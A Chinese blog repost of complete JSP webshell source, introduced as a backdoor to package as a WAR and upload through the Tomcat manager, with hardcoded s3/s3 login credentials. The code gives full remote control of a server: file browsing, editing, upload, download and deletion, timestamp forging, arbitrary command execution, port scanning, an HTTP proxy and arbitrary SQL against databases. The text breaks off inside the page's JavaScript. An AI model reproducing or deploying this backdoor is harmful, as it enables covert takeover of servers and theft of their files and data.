转载:JSP后门代码(原出处CSDN)

最新推荐文章于 2024-07-29 15:05:17 发布
最新推荐文章于 2024-07-29 15:05:17 发布
阅读量333 收藏
点赞数
原文链接:http://www.cnblogs.com/xewnwsl2001/archive/2010/11/27/1889977.html
版权

通过 jar cvf aa.war .

打包成aa.war文件

 

通过tomcat后台上传到服务器即可

试用了一下,功能很全面。

对数据库密码的获取没搞懂,不知道如何获取到sa的密码。

该后门的密码,我自己改成了用户s3密码s3

 

ExpandedBlockStart.gif 代码
<% @page  import = " java.util.*,java.io.*,java.sql.*,java.util.zip.*,java.lang.reflect.*,java.net.*,javax.servlet.jsp.* " %>
<% @page pageEncoding = " gbk " %>
<%!
final  String APP_NAME = " KJ021320 JSP Manage-System 1.0 " ;
 int  portListen = 5000 ; // set the httpproxy port
boolean  openHttpProxy = false ; // set the httpproxy load-on-start-up

 // the main framwork
void  mainForm(String web_Site,JspWriter out) throws  Exception{
    out.print( " <table width=100% height=100% border=0 bgcolor=menu> " );
    out.print( " <tr><td height=30 colspan=2> " );
    out.print( " <table width=100% height=25 border=0> " );
    out.print( " <form name=address method=post target=FileFrame onSubmit='checkUrl();'> " );
    out.print( " <tr><td width=60 align=center>FilePath:</td><td> " );
    out.print( " <input name=FolderPath style=width:100% value=' " + web_Site + " ' οnchange='checkUrl();'> " );
    out.print( " <input type=hidden name=Action value=F> " );
    out.print( " <input type=hidden name=Filename> " );
    out.print( " </td><td width=60 align=center><a href='javascript:checkUrl();'>GOtoLink</a> " );
    out.print( " </td></tr></form></table></td></tr><tr><td width=148> " );
    out.print( " <iframe name=Menu src=?Action=M width=100% height=100% frameborder=2 scrolling=yes></iframe></td> " );
    out.print( " <td width=600> " );
    out.print( " <iframe name=FileFrame src='?Action=F&FolderPath= " + web_Site + " ' width=100% height=100% frameborder=1 scrolling=yes></iframe> " );
    out.print( " </td></tr></table> " );
}
 // menu form to choose
void  mainMenu(JspWriter out,String web_Site) throws  Exception{
    out.println( " <table> " );
    out.println( " <tr><td bgcolor=Gray><a href=?Action=M> " + ico( 58 ) + " FileOperation(File.class)</a></td></tr> " );
    out.println( " <tr><td bgcolor=menu οnclick=top.address.FolderPath.value=' " + folderReplace(web_Site) + " '><a href='?Action=F&FolderPath= " + web_Site + " ' target=FileFrame> " + ico( 48 ) + " WEB Folder</a></td></tr> " );
    out.println( " <tr><td bgcolor=menu><a href=?Action=S target=FileFrame> " + ico( 53 ) + " SystemInfo(System.class)</a></td></tr> " );
    out.println( " <tr><td bgcolor=menu><a href=?Action=L target=FileFrame> " + ico( 53 ) + " ServletInfo</a></td></tr> " );
    out.println( " <tr><td bgcolor=menu><a href=?Action=T target=FileFrame> " + ico( 53 ) + " SystemTools</a></td></tr> " );
    out.println( " <tr><td bgcolor=menu><a href=?Action=i target=FileFrame> " + ico( 57 ) + " Interfaces</a></td></tr> " );
    out.println( " <tr><td bgcolor=menu><a href='http://blog.csdn.net/kj021320' target=FileFrame>About nonamed(kj021320)</a></td></tr> " );
    out.println( " </table> " );
}
 // show all files and folders
void  showFiles(JspWriter out,String path) throws  Exception{
    File file = new  File(path);
     long  maxSize = 0 ;
     if (file.isDirectory() && file.exists()){
        File[] f = file.listFiles();
        out.println( " <table><tr bgcolor=menu><td>name</td><td>type</td><td>size</td><td>modify date</td><td>readonly</td><td>can write</td><td>hidden</td><td>Action</td></tr> " );
         for ( int  i = 0 ;i < f.length;i ++ ){
            maxSize = maxSize + f[i].length();
             if (f[i].isDirectory())
                out.println( " <tr bgcolor=menu><td><a href=\ " javascript:top.address.FolderPath.value = ' "+folderReplace(f[i].getAbsolutePath())+"/ ' ;checkUrl();\ " > " + ico( 48 ) + f[i].getName() + " </a></td><td> DIR </td><td> " + getSize(f[i].length()) + " </td><td> " + new  java.util.Date(f[i].lastModified()) + " </td><td> " + f[i].canRead() + " </td><td> " + f[i].canWrite() + " </td><td> " + f[i].isHidden() + " </td><td> " + fOperation( true ,f[i].getAbsolutePath()) + " </td></tr> " );
             else
                out.println( " <tr><td> " + ico( 50 ) + f[i].getName() + " </td><td> file </td><td> " + getSize(f[i].length()) + " </td><td> " + new  java.util.Date(f[i].lastModified()) + " </td><td> " + f[i].canRead() + " </td><td> " + f[i].canWrite() + " </td><td> " + f[i].isHidden() + " </td><td> " + fOperation( false ,f[i].getAbsolutePath()) + " </td></tr> " );
        }
        out.println( " </table> " );
        out.print( " this folder size: " + getSize(maxSize));
    }
}
 // show the system information
void  showSystemInfo(JspWriter out) throws  Exception{
    Map map = null ;
    Set set = null ;
    Iterator it = null ;

     /* use for jdk1.5
    map=System.getenv();
    set=map.keySet();
    it=set.iterator();
    out.print("<hr>System Env info:<ul>");
    while(it.hasNext()){
        Object oName=it.next();
        out.println("<li>"+oName+" [ "+map.get(oName)+" ]");
    }
    out.print("</ul>");
     */

    map = System.getProperties();
    set = map.keySet();
    it = set.iterator();
    out.println( " <hr>System Property info:<ul> " );
         while (it.hasNext()){
        Object oName = it.next();
        out.println( " <li> " + oName + "  [  " + map.get(oName) + "  ] " );
    }
    out.print( " </ul><hr>System CPU : " );
    out.print(Runtime.getRuntime().availableProcessors() + "  <br> " );
    out.print( " the JVM Free Memory : " + getSize(Runtime.getRuntime().freeMemory()));
    out.print( " <br>the JVM Max Memory : " + getSize(Runtime.getRuntime().maxMemory()));
}
 // show servlet information
void  servletInfo(ServletConfig config,JspWriter out) throws  Exception{
    ServletContext sc = config.getServletContext();
    out.println( " Server info:  " + sc.getServerInfo() + " <br> " );
    out.println( " ServletContext name:  " + sc.getServletContextName() + " <br> " );
    out.println( " Major version : " + sc.getMajorVersion() + " <br> " );
    out.println( " Minor version : " + sc.getMinorVersion() + " <br> " );
    Enumeration en = sc.getInitParameterNames();
    String initInfo = " init parameter: <br> " ;
    out.print(initInfo);
     while (en.hasMoreElements()){
        String name = (String)en.nextElement();
        initInfo = " key: " + name + "  value: " + sc.getInitParameter(name)  + " <br> " ;
        out.print(initInfo);
    }

}
 // down the server file
void  downFile(String filename,HttpServletResponse res) throws  Exception{
     int  w = 0 ;
     byte [] buffer = new   byte [ 256 ];
     byte [] b = ( new  File(filename)).getName().getBytes();
    String outFile = new  String(b, " ISO-8859-1 " );
    res.reset();
    res.setHeader( " Content-disposition " , " attachment;filename=\ "" +outFile+ " \ "" );
    ServletOutputStream sos = res.getOutputStream();
    BufferedInputStream bis = null ;
     try {
        bis = new  BufferedInputStream( new  FileInputStream(filename));
         while ((w = bis.read(buffer, 0 ,buffer.length)) !=- 1 ){
            sos.write(buffer, 0 ,w);
        }
    } catch (Exception e){
    } finally {
         if (bis != null )bis.close();
    }
    sos.flush();
    res.flushBuffer();
}
 // delect file
void  deleteFile(String filename,JspWriter out) throws  Exception{
    File f = new  File(filename);
     if (f.exists()){
         if (f.delete())out.print(filename + " delete success... " );
    } else {
        out.print( " file not find!! " );
    }
}
 // rename the file
void  renameFile(String filename,JspWriter out) throws  Exception{
     int  split = filename.indexOf( " | " );
    String newFilename = filename.substring(split + 1 );
    filename = filename.substring( 0 ,split);
    File f = new  File(filename);
     if (f.exists()){
         if (f.renameTo( new  File(newFilename)))out.print(newFilename + "  file move success " );
    } else {
        out.print( " file not find!! " );
    }
}
 // file copy
void  copyFile(String filename,JspWriter out) throws  Exception{
     int  split = filename.indexOf( " | " );
    String newFilename = filename.substring(split + 1 );
    filename = filename.substring( 0 ,split);
    File f = new  File(filename);
    BufferedInputStream bis = null ;
    BufferedOutputStream bos = null ;
     if (f.exists()){
         try {
            bis = new  BufferedInputStream( new  FileInputStream(filename));
            bos = new  BufferedOutputStream( new  FileOutputStream(newFilename));
             int  s = 0 ;
             while ((s = bis.read()) !=- 1 ){
                bos.write(s);
            }
        } catch (Exception e){
            out.print( " file copy error " );
        } finally {
             if (bis != null )bis.close();
             if (bos != null )bos.close();
        }
        out.print(newFilename + " file copy success " );
    } else {
        out.print( " file not find!! " );
    }
}
 // file editor
void  editFile(String filename,JspWriter out) throws  IOException{
    File f = new  File(filename);
    out.print( " <form method=post>File Path: " );
    out.print( " <input type=text size=80 name=filename value=' " + filename + " '> " );
    out.print( " <input type=button name=kFile onClick='this.form.action=\ " ? Action = K\ " ;this.form.submit();' value=KeepFile > " );
    out.print( " <input type=button onClick=editFile(this.form.filename.value); value=ReadFile> " );
    out.print( " <textarea name=FileContent rows=35 style=width:100%;> " );
     if (f.exists()){
         try {
            BufferedReader br = new  BufferedReader( new  InputStreamReader( new  FileInputStream(filename), " Gb2312 " ));
            String s = "" ;
             while ((s = br.readLine()) != null ){
                out.println(htmlEntity(s));
            }
        } catch (Exception e){
            out.print( " file edit error " );
        } finally {
        }
    }
    out.print( " </textarea></form> " );
}
 // file save
void  saveFile(String filename, byte [] fileContent,JspWriter out) throws  IOException{
     if (filename != null || fileContent != null ){
        BufferedOutputStream bos = null ;
         try {
            bos = new  BufferedOutputStream( new  FileOutputStream(filename));
            bos.write(fileContent, 0 ,fileContent.length);
        } finally {
             if (bos != null )bos.close();
        }
        out.print(filename + " file save success " );
    } else {
        out.print( " Error " );
    }
}
 // chang the file modify date
void  dateChange(String filename,String year,String month,String day,JspWriter out) throws  IOException{
    File f = new  File(filename);
     if (f.exists()){
        Calendar calendar = Calendar.getInstance();
        calendar.set(Integer.parseInt(year),Integer.parseInt(month),Integer.parseInt(day));
         if (f.setLastModified(calendar.getTimeInMillis()))
            out.print(filename + " file date change success " );
         else
            out.print(filename + " file date change error " );
    } else {
        out.println( " file not find!!! " );
    }
}
 // run file
void  execFile(String file,JspWriter out) throws  Exception{
     int  i = 0 ;
    Runtime rt = Runtime.getRuntime();
    Process ps = rt.exec(file);
    InputStreamReader isr  =   null ;
     char [] bufferC = new   char [ 1024 ];
     try {
        isr = new  InputStreamReader(ps.getInputStream(), " GB2312 " );
        out.print( " <textarea rows=35 style=width:100%;> " );
         while ((i = isr.read(bufferC, 0 ,bufferC.length)) !=- 1 ){
            out.print(htmlEntity( new  String(bufferC, 0 ,i)));
        }
    } catch (Exception e){
        out.print( " run file error " );
    } finally {
         if (isr != null )isr.close();
    }
    out.print( " </textarea> " );
    systemTools(out);
}
 // zip zhe folder
void  zip(String zipPath, String srcPath,JspWriter out)  throws  Exception {
    FileOutputStream output  =   null ;
    ZipOutputStream zipOutput  =   null ;
     try {
        output  =   new  FileOutputStream(zipPath);
        zipOutput  =   new  ZipOutputStream(output);
        zipEntry(zipOutput,srcPath,srcPath,zipPath);
    } catch (Exception e){
        out.print( " file zip error " );
    } finally {
         if (zipOutput != null )zipOutput.close();
    }
    out.print( " zip ok " + zipPath);
}
 // add the zip entry
void  zipEntry(ZipOutputStream zipOs, String initPath,String filePath,String zipPath)  throws  Exception {
    String entryName  =  filePath;
    File f  =   new  File(filePath);
     if  (f.isDirectory()){ //  check is folder
        String[] files  =  f.list();
         for ( int  i  =   0 ; i  <  files.length; i ++ )
            zipEntry(zipOs, initPath, filePath  +  File.separator  +  files[i],zipPath);
         return ;
    }
    String chPh  =  initPath.substring(initPath.lastIndexOf( " / " +   1 ); //  ?????
     int  idx = initPath.lastIndexOf(chPh);
     if  (idx  !=   - 1 ) {
        entryName  =  filePath.substring(idx);
    }
    ZipEntry entry;
    entry  =   new  ZipEntry(entryName);
    File ff  =   new  File(filePath);
     if (ff.getAbsolutePath().equals(zipPath)) return ;
    entry.setSize(ff.length());
    entry.setTime(ff.lastModified());
     // the CRC efficacy
    entry.setCrc( 0 );
    CRC32 crc  =   new  CRC32();
    crc.reset();
    zipOs.putNextEntry(entry);
     int  len  =   0 ;
     byte [] buffer  =   new   byte [ 2048 ];
     int  bufferLen  =   2048 ;
    FileInputStream input  = null ;
     try {
        input  =   new  FileInputStream(filePath);
         while  ((len  =  input.read(buffer,  0 , bufferLen))  !=   - 1 ) {
                zipOs.write(buffer,  0 , len);
                crc.update(buffer,  0 , len);
        }
    } catch (Exception e){
    } finally {
         if (input != null )input.close();
    }
    entry.setCrc(crc.getValue());
}
 // file upload to server
void  upfile(HttpServletRequest request,JspWriter out,String filename) throws  Exception{
        String boundary  =  request.getContentType().substring( 30 ); // ?????
        ServletInputStream sis = request.getInputStream();
        BufferedOutputStream bos = null ;
         byte [] buffer  =   new   byte [ 1024 ];
         int  line =- 1 ;
         for ( int  i = 0 ;i < 5 ;i ++ ){
            line = readLine(buffer,sis,boundary);
        }
         try {
            bos = new  BufferedOutputStream( new  FileOutputStream(filename));
             // read the filedata
             while (line !=- 1 ){
                bos.write(buffer, 0 ,line);
                line = readLine(buffer,sis,boundary);
            }
            out.print( " upload success! " );
        } catch (Exception e){
            out.print( " upload error " );
        } finally {
             if (bos != null )bos.close();
        }
}
 int  readLine( byte [] lineByte,ServletInputStream servletInputstream,String endStr){
     try {
         int  len = 0 ;
        len = servletInputstream.readLine(lineByte, 0 ,lineByte.length);
        String str = new  String(lineByte, 0 ,len);
        System.out.println(str);
         if (str.indexOf(endStr) ==- 1 )
             return  len;
         else
             return   - 1 ;
    } catch (Exception _ex){
         return   - 1 ;
    }
}
 // create folder
void  newFolder(JspWriter out,String foldername) throws  Exception{
    File f = new  File(foldername);
     if (f.mkdirs()){
        out.print( " the folder create success! " );
    } else {
        out.print( " the folder create error " );
    }
}
 // reflect java API classes
void  reflectAPI(JspWriter out,String className) throws  Exception{
    Class cls = Class.forName(className);
    String constructor = "" ;
    String ifString = "" ;
    Class[] interfaces = cls.getInterfaces();
    String supperClass = cls.getSuperclass().toString();
    Constructor[] c = cls.getDeclaredConstructors();
    Field[] f = cls.getDeclaredFields();
    Method[] m = cls.getDeclaredMethods();

     for ( int  i = 0 ;i < interfaces.length;i ++ ){
        ifString = ifString + interfaces[i].getName() + " , " ;
    }
    out.print( " <strong> " + Modifier.toString(cls.getModifiers()) + " </strong>  " + cls + " <br><strong>extends</strong>  " + supperClass + "  <strong><br>implemets</strong>  " + ifString);

    out.print( " <br>{<br><EM>Constructor:</EM><br> " );
     for ( int  i = 0 ;i < c.length;i ++ )
        out.print( " &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; " + c[i] + " <br> " );
    out.print( " <EM>Field:</EM><br> " );
     for ( int  i = 0 ;i < f.length;i ++ )
        out.print( " &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; " + f[i] + " <br> " );
    out.print( " <EM>Function:</EM><br> " );
     for ( int  i = 0 ;i < m.length;i ++ )
        out.print( " &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; " + m[i] + " <br> " );
    out.print( " <br>} " );
}
 // scan the remote server port
void  scanPort(JspWriter out,String strAddress, int  startPort, int  endPort) throws  Exception{
     if (endPort < startPort || startPort <= 0 || startPort > 65535 || endPort > 65535 || endPort <= 0 ){
        out.print( " port setup error " );
         return ;
    }
    InetAddress ia = InetAddress.getByName(strAddress);
     for ( int  p = startPort;p <= endPort;p += 15 ){
        ( new  ScanPort(ia,p,p + 14 ,out)).start();
    }
    Thread.sleep(( int )(endPort / startPort) * 5000 );
} // scan port class
class  ScanPort  extends  Thread{
     int  startPort;
     int  endPort;
    InetAddress address;
    javax.servlet.jsp.JspWriter out;
     public  ScanPort(InetAddress address, int  startPort, int  endPort,JspWriter out){
         this .address = address;
         this .startPort = startPort;
         this .endPort = endPort;
         this .out = out;
    }
     public   void  run(){
       Socket s = null ;
        for ( int  port = startPort;port <= endPort;port ++ ){
            try {
               s = new  Socket(address,port);
               out.println( " port  " + port + "  is Open<br> " );
           }
            catch (IOException e){
           } finally {
                 try {s.close();} catch (Exception e){}
           }
       }
    }
}
 public   void  switchProxyService(JspWriter out) throws  Exception{
  if (openHttpProxy =! openHttpProxy){ // open the proxy
   new  RunProxyService(portListen).start();
  out.print( " Proxy running " );
 } else {
  out.print( " Proxy closed " );
 }
}
 // open httpProxy service
public   class  RunProxyService  extends  Thread{
  int  port;
  public  RunProxyService( int  port){
   this .port = port;
 }
  public   void  run(){
   try  {
   ServerSocket ss = new  ServerSocket( 5000 );
    while ( true ){
     if (openHttpProxy){
      new  HttpProxy(ss.accept()).start();
    } else {
      break ;
    }
   }
   ss.close();
  }  catch  (IOException e) {
  }
 }
}
 // HttpProxy class
public   class  HttpProxy  extends  Thread{
  private  Socket s;
  public   int  timeOut = 10000 ;
  public  HttpProxy(Socket s){
   this .s = s;
 }
  public  HttpProxy(Socket s, int  timeOut){
   this .s = s;
   this .timeOut = timeOut; // set the connection timeout
 }
  public   void  run(){
   byte [] bit = new   byte [ 1024 ];
   int  readBit = 0 ;
   int  size = 0 ;
  String returnAddress = null ; // return to the address
   int  returnPort  =   0 // return to the port
  String sendHostName = null ;
   int  sendPort = 0 ;
  Socket sendSocket = null ;
  OutputStream os = null ;
  InputStream is = null ;
   try {
    int  split = 0 ;

   is = s.getInputStream();
    // get the http head information
    if ((size = is.read(bit,  0 , bit.length)) ==- 1 ) return ;

   String httpHead = new  String(bit, 0 ,size);
   split = httpHead.indexOf( " \nHost:  " ) + 7 ;
   sendHostName = httpHead.substring(split, httpHead.indexOf( " \n " , split));
    // get the hostname and port
    if ((split = sendHostName.indexOf( ' : ' )) !=- 1 ){
    sendPort = Integer.parseInt(sendHostName.substring(split + 1 ).trim());
    sendHostName = sendHostName.substring( 0 ,split);
    sendSocket = new  Socket(sendHostName.trim(),sendPort);
   } else {
    sendSocket = new  Socket(sendHostName.trim(), 80 );
   }
   sendSocket.setSoTimeout(timeOut);
    // send user headhttp
   os = sendSocket.getOutputStream();
   os.write(httpHead.getBytes());
    // send user datas
    if (size == bit.length)
    while ((size = is.read(bit,  0 , bit.length)) !=- 1 ){
    os.write(bit, 0  , size);
   }
   os.flush();
    // get WEBSITE html   and  user browser's output
   is = sendSocket.getInputStream();
   os = s.getOutputStream();

    while ((size = is.read(bit,  0 , bit.length)) !=- 1 ){
    os.write(bit, 0  , size);
    os.flush();
   }
  } catch (SocketException se){
  }  catch  (IOException ie) {
  }  catch  (Exception e) {
  } finally {
    // close the stream
    if (is != null ){
     try  {
     is.close();
    }  catch  (IOException e) {
    }
   }
    if (os != null ){
     try  {
     os.close();
    }  catch  (IOException e) {
    }
   }
  }
 }
}
 // connection to the database
void  ConnectionDBM(JspWriter out,String driver,String url,String userName,String passWord,String sqlAction,String sqlCmd) throws  Exception{
 DBM dbm = new  DBM(driver,url,userName,passWord,out);
  if (sqlAction.equals( " LDB " )){
  dbm.lookInfo();
 } else {
  dbm.executeSQL(sqlCmd);
 }
 dbm.closeAll();
}
 // database manager class
class  DBM{
     private  JspWriter out;
     private  Connection con;
     private  Statement stmt;
     private  ResultSet rs;
     public  DBM(String driverName,String url,String userName,String passWord,JspWriter out) throws  Exception{
        Class.forName(driverName);
         this .out = out;
        con = DriverManager.getConnection(url,userName,passWord);
    }
     public   void  lookInfo() throws  Exception{
     DatabaseMetaData dbmd = con.getMetaData();
     String tableType = null ;
     out.print( " <strong>DataBaseInfo</strong><table> " );
     out.print( " <tr><td>DataBaseName:</td><td> " + dbmd.getDatabaseProductName() + " </td></tr> " );
     out.print( " <tr><td>DataBaseVersion:</td><td> " + dbmd.getDatabaseProductVersion() + " </td></tr> " );
     out.print( " <tr><td>the Numeric Function:</td><td> " + dbmd.getNumericFunctions() + " </td></tr> " );
     out.print( " <tr><td>the String Function:</td><td> " + dbmd.getStringFunctions() + " </td></tr> " );
     out.print( " <tr><td>the TimeDate Function:</td><td> " + dbmd.getTimeDateFunctions() + " </td></tr> " );
     out.print( " <tr><td>the System Function:</td><td> " + dbmd.getSystemFunctions() + " </td></tr> " );
     out.print( " </table> " );
     out.print( " <strong>ProcedureInfo</strong><table> " );
      try {
      getProcedureDetail(dbmd.getProcedures( null , null , null ));
     } catch (Exception proE){}

      // show  all the tables
      try {
      rs = dbmd.getTables( null , null , null , null );
     } catch (Exception tabE){}
     out.print( " <strong>DataBase Tables Info</strong><br> " );
      while (rs.next()){
      tableType = rs.getString( 4 );
      out.print( " <strong>TableName:</strong> " + rs.getString( 3 ) + "  <strong>Type:</strong> " + tableType + " <br> " );
       if (tableType.indexOf( " VIEW " ) >= 0 || tableType.indexOf( " TABLE " ) >= 0 ){
        try {
        getTableDetail(dbmd.getColumns( null , null ,rs.getString( 3 ), null ));
       } catch (Exception columnE){}
      }
     }
      this .closeAll();
    }
     // show the column information
     private   void  getTableDetail(ResultSet tableRs) throws  Exception{
        out.print( " <table border=1><tr><td>COLUMN_NAME</td><td>DATA_TYPE</td><td>TYPE_NAME</td><td>COLUMN_SIZE</td><td>IS_NULLABLE</td><td>CHAR_OCTET_LENGTH</td></tr> " );
         while (tableRs.next()){
            out.print( " <tr><td> " + tableRs.getString( 4 ) + " </td><td> " + tableRs.getInt( 5 ) + " </td><td> " + tableRs.getString( 6 ) + " </td><td> " + tableRs.getInt( 7 ) + " </td><td> " + tableRs.getString( 18 ) + " </td><td> " + tableRs.getInt( 16 ) + " </td></tr> " );
        }
        out.print( " </table> " );
        tableRs.close();
    }
     // show all the procedures
     private   void  getProcedureDetail(ResultSet procRs) throws  Exception{
     out.print( " <table border=1><tr><td>PROCEDURE_NAME</td><td>REMARKS</td><td>PROCEDURE_TYPE</td></tr> " );
      while (procRs.next()){
      out.print( " <tr><td> " + procRs.getString( 3 ) + " </td><td> " + procRs.getString( 7 ) + " </td><td> " + procRs.getShort( 8 ) + " </td></tr> " );
     }
     out.print( " </table> " );
     procRs.close();
    }
     // run the sql command
     public   void  executeSQL(String sqlCmd) throws  Exception{
     stmt = con.createStatement();
      if (sqlCmd.trim().toLowerCase().startsWith( " select " )){
      rs = stmt.executeQuery(sqlCmd);
      ResultSetMetaData rsmd = rs.getMetaData();
       int  ColumnCount = rsmd.getColumnCount();
      out.print( " <table border=1><tr> " );
       for ( int  i = 1 ;i <= ColumnCount;i ++ ){
       out.print( " <td> " + rsmd.getColumnName(i) + " </td> " );
      }
      out.print( " </tr> " );
       while (rs.next()){
       out.print( " </tr> " );
           for ( int  i = 1 ;i <= ColumnCount;i ++ ){
           out.print( " <td> " + rs.getString(i) + " </td> " );
          }
          out.print( " </tr> " );
      }
     } else {
      stmt.executeUpdate(sqlCmd);
      out.print( " execute success " );
     }


    }
     // close all the resource
     public   void  closeAll() throws  SQLException{
         try {
             if (rs != null )rs.close();
        } catch (Exception e){
        }
         try {
             if (stmt != null )stmt.close();
        } catch (Exception e){
        }
         try {
          if (con != null )con.close();
        } catch (Exception e){
        }
    }
}
 // the other tools
void  systemTools(JspWriter out) throws  Exception{
    out.print( " <table border=1> " );
    out.print( " <tr><form method=post action='?Action=run'><td bordercolorlight=Black bgcolor=menu>System class run</td> " );
    out.print( " <td colspan=2>filepath:<input name=execFile size=75 type=text title='example d:\\cmd.exe /c dir c:'></td><td><input name=go type=submit value=run></td></form></tr> " );
    out.print( " <tr><form method=post enctype=\ " multipart / form - data\ "  action='?Action=Upfile'><td bordercolorlight=Black bgcolor=menu>file upload</td> " );
    out.print( " <td colspan=2>file:<input name=file type=file>up to file<input title='d:\\1.txt' name=UPaddress size=35 type=text></td><td><input name=up οnclick=\ " this .form.action += ' &UPaddress= ' + this .form.UPaddress.value;\ "  type=submit value=upl></td></form></tr> " );
    out.print( " <tr><form method=post action='?Action=EditFile'><td bordercolorlight=Black bgcolor=menu>new file</td><td colspan=2>file full name:<input name=Filename type=text size=50></td><td><input name=submit type=submit value=new></td> " );
    out.print( " </form></tr> " );
    out.print( " <tr><form method=post action='?Action=newFolder'><td bordercolorlight=Black bgcolor=menu>Create folder</td><td colspan=2>folder fullname:<input name=Filename type=text size=50></td><td><input name=submit type=submit value=new></td> " );
    out.print( " </form></tr> " );
    out.print( " <tr><form method=post action='?Action=APIreflect'><td bordercolorlight=Black bgcolor=menu>Reflect API</td><td colspan=2>Class Name:<input name=Filename title=java.lang.String type=text size=50></td><td><input name=submit type=submit value=ref></td> " );
    out.print( " </form></tr> " );
    out.print( " <tr><form method=post action='?Action=IPscan'><td bordercolorlight=Black bgcolor=menu>Scan Port</td><td>IP:<input name=IPaddress type=text size=20></td><td>Start Port:<input name=startPort title=1-65535 type=text size=5>End Port:<input name=endPort title=1-65535 type=text size=5></td><td><input name=submit type=submit value=sca></td> " );
    out.print( " </form></tr> " );
    out.print( " <tr><form method=post action='?Action=sql'> " );
    out.print( " <td bordercolorlight=Black bgcolor=menu>DBM " );
    out.print( " <select name=DB onChange='setDataBase(this.form);'><option>Sybase</option><option>Mssql</option><option>Mysql</option><option>Oracle</option><option>DB2</option><option>PostgreSQL</option></select></td><td> " );
    out.print( " Driver:<input name=driver type=text>URL:<input name=conUrl type=text>user:<input name=user type=text size=3>password:<input name=password type=text size=3></td> " );
    out.print( " <td>SqlCmd:<input type=text name=sqlcmd title='select * from admin'><input name=run type=submit value=Exec></td> " );
    out.print( " <td><input name=run type=submit value=LDB></td> " );
    out.print( " </form></tr> " );
     if ( ! openHttpProxy){
     out.print( " <tr><td><a href='?Action=HttpProxy' target=FileFrame>OpenTheHttpProxy</a></td></tr> " );
    } else {
     out.print( " <tr><td><a href='?Action=HttpProxy' target=FileFrame>CloseTheHttpProxy</a></td></tr> " );
    }
    out.print( " </table> " );
}
 // user interfaces========================== //
 void  userInterFaces(JspWriter out) throws  Exception{
 out.print( " if u want to add an function ,u can coding in 'userInterFaces'function " );

}
 // ========================================= //
String encodeChange(String str) throws  Exception{
     if (str == null )
         return   null ;
     else
         return   new  String(str.getBytes( " ISO-8859-1 " ), " gb2312 " );
}
String folderReplace(String folder){
     return  folder.replace( ' \\ ' , ' / ' );
}
String fOperation( boolean  f,String file){
     if (f)
         return   " <a href=\ " javascript:delFile( ' "+folderReplace(file)+" ' )\ " >Delete</a> <a href=\ " javascript:reName( ' "+folderReplace(file)+" ' )\ " >Rename</a> <a href=\ " javascript:setDate( ' "+folderReplace(file)+" ' )\ " >setDate</a> <a href=\ " javascript:zipFile( ' "+folderReplace(file)+" ' )\ " >Zip</a> " ;
     else
         return   " <a href=\ " javascript:delFile( ' "+folderReplace(file)+" ' )\ " >Delete</a> <a href=\ " javascript:reName( ' "+folderReplace(file)+" ' )\ " >Rename</a> <a href=\ " javascript:setDate( ' "+folderReplace(file)+" ' )\ " >setDate</a> <a href=\ " javascript:copyFile( ' "+folderReplace(file)+" ' )\ " >Copy</a> <a href=\ " javascript:editFile( ' "+folderReplace(file)+" ' )\ " >Edit</a> <a href=\ " javascript:downFile( ' "+folderReplace(file)+" ' );\ " >Down</a> " ;
}
String getSize( long  size){
     if (size >= 1024 * 1024 * 1024 ){
         return   new  Long(size / 1073741824L ) + " G " ;
    } else   if (size >= 1024 * 1024 ){
         return   new  Long(size / 1048576L ) + " M " ;
    } else   if (size >= 1024 ){
         return   new  Long(size / 1024 ) + " K " ;
    } else
         return  size + " B " ;
}
String ico( int  num){ // ico
     return   " <font face=wingdings size=3>&# " + num + " </font> " ;
}
String htmlEntity(String htmlCode){
 StringBuffer sb = new  StringBuffer();
  char  c = 0 ;
  for ( int  i = 0 ;i < htmlCode.length();i ++ ){
  c = htmlCode.charAt(i);
   if (c == ' < ' )sb.append( " &lt; " );
   else   if (c == ' > ' )sb.append( " &gt; " );
   else   if (c == '   ' )sb.append( " &nbsp; " );
   else  sb.append(c);
 }
  return  sb.toString();
}
 %>
<%
    session.setMaxInactiveInterval( 6000 );
     final  String WEB_SITE = folderReplace(application.getRealPath( " / " ));
     final  String URL = request.getRequestURI();
     if (session.getAttribute( " ID " ) == null ){
         //  the user and pass  field
        String username = " s3 " ;
        String password = " s3 " ;
         //  the user and pass  field

   if (request.getParameter( " LName " ) != null && request.getParameter( " LPass " ) != null && request.getParameter( " LName " ).equals(username) && request.getParameter( " LPass " ).equals(password)){
            session.setAttribute( " ID " , " 1 " );
            response.sendRedirect(URL);
        } else {
            out.println( " <center style=font-size:12px><br><br> " + APP_NAME + " <br><br> "   +
                        " <form name=login method=post>username:<input name=LName type=text size=15><br> "   +
                     " password:<input name=LPass type=password size=15><br><input type=submit value=Login></form></center> " );
        }
         return ;
    }

 %>
< html >
< head >
< meta http - equiv = Content - Type content = " text/html; charset=gb2312 " >
< title ><%= APP_NAME %></ title >
< style type = " text/css " >
 body,td{font - size: 12px;}
table{T:expression( this .border = ' 1 ' , this .borderColorLight = ' Black ' , this .borderColorDark = ' White ' );}
 input,select{font - size:12px;}
 body{margin - left:0px;margin - top:0px;margin - right:0px;margin - bottom:0px;}
 td{white - space:nowrap;}
 a{color:black;text - decoration:none;}
 </ style >
< script >
    Top = top.address;
    function downFile(file){
        Top.Filename.value = file;
        Top.Action.value = " D " ;
        Top.submit();
    }
    function checkUrl(){
        top.address.Action.value = " F " ;
        top.address.submit();
    }
    function editFile(file){
        top.address.Action.value = " E " ;
        top.address.Filename.value = file;
        top.address.submit();
    }
    function delFile(file){
        top.address.Action.value = " R " ;
        top.address.Filename.value = file;
        top.address.submit();
    }
    function reName(file){
         if ((Rname = prompt( " rename to? " ,file)) != "" && Rname != null ){
            Top.Action.value = " N " ;
            top.address.Filename.value = file + " | " + Rname;
            Top.submit();
        }
    }
    function copyFile(file){
         if ((Rname = prompt( " copy to? " ,file)) != "" && Rname != null ){
            Top.Action.value = " P " ;
            top.address.Filename.value = file + " | " + Rname;
            Top.submit();
        }
    }
    function setDate(file){
        document.write( " Change date:<br><form method='post' action='?Action=dateChange'> " );
        document.write( " filename:<input name='Filename' type='text' size=60 readonly value=' " + file + " '><br> " );
        document.write( " Year:<select name='year'> " );
         for (i = 1970 ;i <= 2050 ;i ++ ){
            document.write( " <option value= " + i + " > " + i + " </option> " );
        }
        document.write( " </select> " );
        document.write( " Month:<select name='month'> " );
         for (i = 1 ;i <= 12 ;i ++ ){
            document.write( " <option value= " + i + " > " + i + " </option> " );
        }
        document.write( " </select> " );
        document.write( " Day:<select name='day'> " );
         for (i = 1 ;i <= 31 ;i ++ ){
